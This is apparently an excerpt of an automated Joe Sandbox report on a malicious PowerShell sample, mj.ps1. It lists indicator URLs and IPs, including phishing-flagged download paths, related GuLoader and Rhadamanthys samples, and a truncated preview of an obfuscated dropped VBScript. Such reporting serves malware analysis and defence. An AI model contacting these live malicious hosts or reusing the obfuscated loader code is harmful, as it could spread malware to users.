                                            http://almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.almrwad.com/wh/Subordinerendes78powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.erp-royal-crown.info/wh/Subordpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fornid.compowershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wh/Subordinerepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.info/whpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.fornid.com/sitemappowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.almrwad.com/wh/Subordinerendpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subordipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Suborpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.fornid.com/il-mio-accountpowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subopowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.almrwad.com/wh/Subordinerepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.inpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.almrwad.com/wh/Subordipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.copowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.com/wh/Subordinerendes78.powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://www.erp-royal-crown.info/wh/Subordinerendespowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdfpowershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subopowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://blog.fornid.com/powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.erp-royal-crown.info/wh/Subordinerendes78powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.com/wh/Suborpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.erp-royal-crown.info/wh/Subordinerendes7powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.fornid.compowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.fornid.com/cercapowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.info/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://www.almrwad.com/wh/Subordinerenpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.infpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.info/wh/Subpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.193.42.13
                                                          		www.pineappletech.aeBelgium
                                                          		48694ITFPLfalse
                                                          93.95.216.175
                                                          		fornid.comItaly
                                                          		52030SERVERPLAN-ASITtrue
                                                          148.251.114.233
                                                          		erp-royal-crown.infoGermany
                                                          		24940HETZNER-ASDEfalse
                                                          184.171.244.231
                                                          		almrwad.comUnited States
                                                          		33182DIMENOCUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1569000
                                                          Start date and time:2024-12-05 10:38:15 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 21s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:mj.ps1
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winPS1@11/13@4/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 16
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8124 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 832 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: mj.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          04:39:18API Interceptor2162569x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.193.42.13ni.ps1Get hashmaliciousUnknownBrowse
                                                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                93.95.216.175ni.ps1Get hashmaliciousUnknownBrowse
                                                                  148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/fchs/
                                                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  184.171.244.231ni.ps1Get hashmaliciousUnknownBrowse
                                                                    qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.pineappletech.aeni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ITFPLni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          KgQJ0dIs3A.exeGet hashmaliciousAmadey, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          7GC8osUQMq.exeGet hashmaliciousAmadeyBrowse
                                                                          • 91.193.43.180
                                                                          Y3KkfxEZuo.exeGet hashmaliciouszgRATBrowse
                                                                          • 91.193.43.180
                                                                          wqb7dL448k.exeGet hashmaliciousAmadey, Xmrig, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          Oupxwi.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousUnknownBrowse
                                                                          • 91.193.43.119
                                                                          HETZNER-ASDEni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 148.251.114.233
                                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                          • 88.99.61.52
                                                                          https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 5.9.227.67
                                                                          Ttok18.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                          • 49.12.121.47
                                                                          o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                          • 136.243.18.118
                                                                          Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                          • 148.251.0.164
                                                                          SERVERPLAN-ASITni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 93.95.216.175
                                                                          untrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.70.147.14
                                                                          Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                                                          • 185.81.4.143
                                                                          Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8
                                                                          Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\Public\p2q.vbs

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29287
                                                                          Entropy (8bit):5.16757071229696
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                          MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                          SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                          SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                          SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulvyWtlz:NllUqWtl
                                                                          MD5:6E6C2B510FF8665DFAFB81CA42E7E6D8
                                                                          SHA1:5D032FB8A53A7635CBB67510A02A77C0E871FBDA
                                                                          SHA-256:87BF5AB544BC2AC5EB8AB30EB47E267D0C409C69B1C777EFAB58C18D658684C4
                                                                          SHA-512:0C59743514C9D5A0C906321CB467D06FF462BFBF4D2428D24C68DD0A14EE09700E5D38ADBD71250A8D59099BD54CAD2B8DD553A7F6662682E75ADD2432113ECD
                                                                          Malicious:false
                                                                          Preview:@...e.................................>.w............@..........

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mc3530b.h1p.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

